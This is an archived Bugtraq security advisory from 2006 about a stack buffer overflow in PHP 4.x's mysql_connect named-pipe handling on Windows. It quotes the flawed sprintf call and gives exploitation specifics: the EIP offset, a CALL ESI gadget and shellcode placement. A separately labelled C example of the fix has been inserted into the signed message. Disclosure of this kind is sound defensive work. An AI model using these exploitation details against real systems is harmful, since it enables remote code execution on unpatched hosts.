[41981] in bugtraq
Windows PHP 4.x "0-day" buffer overflow
daemon@ATHENA.MIT.EDU (mercenary@hushmail.com)
Thu Jan 5 22:04:52 2006
Message-Id: <200601050352.k053qtgl081037@mailserver2.hushmail.com>
Date: Wed, 4 Jan 2006 19:52:52 -0800
To: <full-disclosure@lists.grok.org.uk>, <bugtraq@securityfocus.com>
Cc:
From: <mercenary@hushmail.com>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Buffer Overflow in PHP MySQL functions
I. RISK
Low - Remote code execution on some systems
The function is not normally exposed to external users via input data.
II. AFFECTED VERSIONS
4.x Branch under Windows
III. BACKGROUND
PHP contains many built-in functions that allow a developer to
interface with MySQL servers. One of these, mysql_connect(),
contains functionality that allows a user to connect to a server
via named pipes.
IV. DESCRIPTION
The format of the mysql_connect function is as follows:
mysql_connect(host, username);
The host field can accept a host in the following format when PHP
is used on a Windows system:
"hostname:/pipe"
where "pipe" is the named pipe to use. Within the internal code,
this pipe name is later copied into a 257-byte internal character
buffer. By supplying an overly long pipe name, we are able to perform a
classic stack-based buffer overflow attack. From
\ext\mysql\libmysql\libmysql.c line 216:
HANDLE create_named_pipe(NET *net, uint connect_timeout, char **arg_host,
                         char **arg_unix_socket)
{
[...]
char szPipeName [ 257 ];
[...]
sprintf( szPipeName, "\\\\%s\\pipe\\%s", host, unix_socket);
The variable unix_socket is the value of the host string after the
trailing colon (:), if it exists.
Because we will be overflowing several pointers, the address of a
valid memory location must also be written to memory 4 bytes after
our replacement EIP. When our EIP is restored, ESI will contain a
pointer to the value of the "username" variable. This can be used
as a location to store our shellcode, as it is a reliable location.
V. EXPLOIT
This exploit was designed to work with PHP versions 4.3.10 and
4.4.0 under Windows XP SP 1. If another operating system is used,
the replacement EIP must be changed.
The replacement EIP is written 261 bytes into our string. For this
exploit, I used a CALL ESI from ws2_32.dll from Windows XP SP1.
The replacement ESI is simply the base of the PHP image. Locations
after this address will be overwritten with some internal data.
Our shellcode is written into the $user variable. $two is used to
prevent $user from being truncated with a MySQL error message.
VI. WORKAROUND
None.
VII. FIX
The length of unix_socket should be verified prior to use. In
addition, the string should be formatted using a safe function such
as snprintf, followed by a hardcoded null terminator.
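The fix described in this section, as an added C example written for this page (it is not PHP's or libmysql's code): the length is checked before anything is copied, snprintf replaces sprintf, and the terminator is written explicitly. The 257-byte buffer size is the one quoted above; the split at the last ':' and the helper names are assumptions.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Size of the internal buffer quoted in the advisory (szPipeName[257]). */
#define PIPE_NAME_MAX 257

/* Hardened replacement for the advisory's
 *   sprintf(szPipeName, "\\\\%s\\pipe\\%s", host, unix_socket);
 * The fixed text "\\" plus "\pipe\" is 8 characters plus the NUL. Returns
 * the formatted length, or -1 when the name would not fit (out untouched). */
int build_pipe_name(char *out, size_t out_len, const char *host, const char *unix_socket)
{
    size_t needed = 8 + strlen(host) + strlen(unix_socket) + 1;
    if (out_len == 0 || needed > out_len)
        return -1;                          /* length check before any copy */
    int n = snprintf(out, out_len, "\\\\%s\\pipe\\%s", host, unix_socket);
    if (n < 0 || (size_t)n >= out_len) {    /* snprintf truncated: treat as an error */
        out[0] = '\0';
        return -1;
    }
    out[out_len - 1] = '\0';                /* hardcoded terminator, as the fix suggests */
    return n;
}

/* Assumed model of the parsing the advisory describes: the text after the
 * last ':' in "hostname:/pipe" is the pipe name. Formats into a 257-byte
 * buffer like the original; returns the name length or -1 on rejection. */
int pipe_name_length(const char *hoststr)
{
    char host[128], pipe_name[PIPE_NAME_MAX];
    const char *colon = strrchr(hoststr, ':');
    if (colon == NULL || (size_t)(colon - hoststr) >= sizeof host)
        return -1;
    memcpy(host, hoststr, (size_t)(colon - hoststr));
    host[colon - hoststr] = '\0';
    return build_pipe_name(pipe_name, sizeof pipe_name, host, colon + 1);
}

/* Constructed over-long input: a 300-character pipe name is rejected
 * instead of overrunning the 257-byte buffer. */
bool overlong_pipe_rejected(void)
{
    char hoststr[320];
    memcpy(hoststr, "localhost:", 10);
    memset(hoststr + 10, 'A', 300);
    hoststr[310] = '\0';
    return pipe_name_length(hoststr) == -1;
}
```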
VIII. POC
POC is attached.
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4
wkYEARECAAYFAkO8lv4ACgkQLpU3lrW2nNMlTACfeYj28WH+qaJRr+UJ41wVUkfSHd8A
niKUfNuCT9LgoX8fjWb7oi2W5QTj
=QoFC
-----END PGP SIGNATURE-----
[Attachments: phpflaw.php, phpflaw.php.sig]